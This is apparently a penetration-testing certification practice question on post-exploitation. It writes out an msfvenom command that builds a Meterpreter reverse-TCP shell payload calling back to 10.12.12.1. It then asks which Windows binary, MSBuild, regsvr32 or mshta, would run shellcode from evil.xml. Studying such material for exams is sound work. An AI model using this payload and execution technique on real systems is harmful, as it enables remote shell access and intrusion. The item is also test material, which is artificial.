QuestionQ245
Post-exploitation and Lateral MovementA tester intends to perform an attack technique through a compromised host. The tester prepares a payload with the following command: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp
The tester then takes the shellcode from the msfvenom command and creates a file named evil.xml. Which of the following commands would the tester most likely use to continue the attack on the host?
- A regsvr32 /s /n /u C:\evil.xml
- B MSBuild.exe C:\evil.xml
- C mshta.exe C:\evil.xml
- D AppInstaller.exe C:\evil.xml
Community Discussion